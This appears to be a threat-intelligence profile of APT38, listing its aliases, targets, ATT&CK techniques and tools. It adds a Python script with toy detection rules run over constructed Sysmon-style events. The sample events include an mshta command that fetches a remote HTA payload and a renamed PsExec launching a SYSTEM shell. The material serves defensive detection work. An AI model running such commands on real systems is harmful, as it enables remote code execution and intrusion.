APT38
Also known as: NICKEL GLADSTONE · BeagleBoyz · Bluenoroff · Stardust Chollima · Sapphire Sleet · COPERNICIUM
Overview
APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext and Banco de Chile; some of its operations have been destructive. North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
Targets
Government · Private sector
Regions
Australia · Bangladesh · Brazil · Canada · China · France · Germany · Guatemala · Hong Kong · India · Japan · South Korea · Thailand · United Kingdom · United States
Named targets
Bangladesh Bank · Cryptocurrency exchanges in South Korea · Sony Pictures Entertainment
Capabilities
- Destructive / data-wiping operations — ATT&CK T1485, T1561.002; software: KillDisk
- Custom malware/implant development — ATT&CK: 4 attributed custom malware families
TTPs — 56 techniques across 12 tactics
Initial Access
- T1189 Drive-by Compromise
- T1566.001 Spearphishing Attachment
Execution
- T1053.003 Cron
- T1053.005 Scheduled Task
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1059.005 Visual Basic
- T1106 Native API
- T1204.001 Malicious Link
- T1204.002 Malicious File
- T1569.002 Service Execution
Persistence
- T1505.003 Web Shell
- T1543.003 Windows Service
Privilege Escalation
- T1548.002 Bypass User Account Control
Stealth
- T1027.002 Software Packing
- T1036.003 Rename Legitimate Utilities
- T1036.006 Space after Filename
- T1055 Process Injection
- T1070.004 File Deletion
- T1070.006 Timestomp
- T1140 Deobfuscate/Decode Files or Information
- T1218.001 Compiled HTML File
- T1218.005 Mshta
- T1218.007 Msiexec
- T1218.011 Rundll32
- T1480.002 Mutual Exclusion
Defense Impairment
- T1112 Modify Registry
- T1553.005 Mark-of-the-Web Bypass
- T1685 Disable or Modify Tools
- T1685.005 Clear Windows Event Logs
- T1686 Disable or Modify System Firewall
- T1686.002 Network Device Firewall
- T1690 Prevent Command History Logging
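Several of the persistence, stealth and defense-impairment techniques listed above (renamed utilities, a trailing space in a file name, timestomping, mshta with a remote payload, a cleared Security log, a service installed from a user-writable path) leave a simple host-telemetry footprint. The script below is an added example, not code from threatfilter.dev or from any vendor report on this page: it runs a handful of rules, keyed by the technique IDs as this page lists them, over constructed JSON event lines whose field names imitate Sysmon (Image, OriginalFileName, CreationUtcTime, TargetFilename) and the Windows Security/System logs (EventID 1102, 7045). The events, the thresholds and the rule names are all assumptions made for the example.

```python
"""Toy detections for TTPs in the persistence / stealth / defense-impairment lists.
Added example; not part of the threatfilter.dev profile. Sample events are
constructed, with field names modelled on Sysmon and Windows event logs."""
import json
import ntpath  # Windows-style paths must be split with ntpath, not os.path
from datetime import datetime

# Constructed sample events (JSON lines): one per technique plus one benign process.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "Image": r"C:\Users\Public\update.exe",
                "OriginalFileName": "PsExec.exe",
                "CommandLine": r"C:\Users\Public\update.exe -s cmd"}),
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
                "OriginalFileName": "MSHTA.EXE",
                "CommandLine": "mshta http://192.0.2.10/a.hta"}),
    json.dumps({"EventID": 11, "TargetFilename": r"C:\Users\bob\Downloads\report.pdf "}),
    json.dumps({"EventID": 2, "TargetFilename": r"C:\Windows\Temp\svc.dll",
                "CreationUtcTime": "2015-07-14 03:12:00.000",
                "PreviousCreationUtcTime": "2023-11-02 09:45:10.000"}),
    json.dumps({"EventID": 1102, "Channel": "Security"}),
    json.dumps({"EventID": 7045, "ServiceName": "WinUpdateSvc",
                "ImagePath": r"C:\ProgramData\svc.exe"}),
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
                "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe"}),
]

SYSMON_TS = "%Y-%m-%d %H:%M:%S.%f"


def renamed_utility(ev):
    """T1036.003: on-disk name differs from the PE version resource's OriginalFileName."""
    if ev.get("EventID") != 1 or "OriginalFileName" not in ev:
        return None
    image = ntpath.basename(ev["Image"]).lower()
    if image != ev["OriginalFileName"].lower():
        return f"T1036.003 renamed utility: {ev['Image']} is really {ev['OriginalFileName']}"
    return None


def space_after_filename(ev):
    """T1036.006: file name ends in a space, hiding the real extension from the shell."""
    name = ev.get("TargetFilename") or ev.get("Image") or ""
    if name != name.rstrip(" "):
        return f"T1036.006 trailing space in file name: {name!r}"
    return None


def timestomp(ev):
    """T1070.006: Sysmon event 2 where the creation time was moved back by a day or more."""
    if ev.get("EventID") != 2:
        return None
    new = datetime.strptime(ev["CreationUtcTime"], SYSMON_TS)
    old = datetime.strptime(ev["PreviousCreationUtcTime"], SYSMON_TS)
    if (old - new).days >= 1:
        return f"T1070.006 timestomp on {ev['TargetFilename']}: {old:%Y-%m-%d} -> {new:%Y-%m-%d}"
    return None


def log_cleared(ev):
    """T1685.005 (ID as listed on this page): Security 1102 / System 104 = log cleared."""
    if ev.get("EventID") in (1102, 104):
        return f"T1685.005 {ev.get('Channel', 'unknown')} event log cleared"
    return None


def mshta_remote(ev):
    """T1218.005: mshta.exe launched with an http(s) URL on its command line."""
    if ev.get("EventID") != 1:
        return None
    image = ntpath.basename(ev.get("Image", "")).lower()
    if image == "mshta.exe" and "http" in ev.get("CommandLine", "").lower():
        return f"T1218.005 mshta with remote payload: {ev['CommandLine']}"
    return None


def suspicious_service(ev):
    """T1543.003: System 7045 service install whose binary lives outside the Windows directory."""
    if ev.get("EventID") != 7045:
        return None
    path = ev.get("ImagePath", "").strip('"').lower()
    if not path.startswith("c:\\windows\\"):
        return f"T1543.003 service {ev.get('ServiceName')} installed from {ev.get('ImagePath')}"
    return None


RULES = (renamed_utility, space_after_filename, timestomp,
         log_cleared, mshta_remote, suspicious_service)


def scan(lines):
    """Run every rule over every JSON event line and return the list of hit strings."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        hits.extend(h for h in (rule(ev) for rule in RULES) if h)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Each rule is deliberately narrow: the OriginalFileName comparison only works where Sysmon (or an EDR that exposes the version resource) is deployed, the timestomp check assumes the attacker pushed the timestamp backwards rather than forwards, and the service rule will flag legitimate third-party installers, so it is a triage signal, not a blocking control.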
Credential Access
- T1110 Brute Force
Discovery
- T1033 System Owner/User Discovery
- T1049 System Network Connections Discovery
- T1057 Process Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery
- T1135 Network Share Discovery
- T1217 Browser Information Discovery
- T1518.001 Security Software Discovery
Collection
- T1005 Data from Local System
- T1056.001 Keylogging
- T1115 Clipboard Data
Command and Control
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
Impact
- T1485 Data Destruction
- T1486 Data Encrypted for Impact
- T1529 System Shutdown/Reboot
- T1561.002 Disk Structure Wipe
- T1565.001 Stored Data Manipulation
- T1565.002 Transmitted Data Manipulation
- T1565.003 Runtime Data Manipulation
Tools & malware (6)
ECCENTRICBANDWAGON · Net · HOPLIGHT · Mimikatz · KillDisk · DarkComet
Reporting (3)
- How Microsoft names threat actors — Microsoft
- NICKEL GLADSTONE Threat Profile — SecureWorks
- CrowdStrike 2021 Global Threat Report — CrowdStrike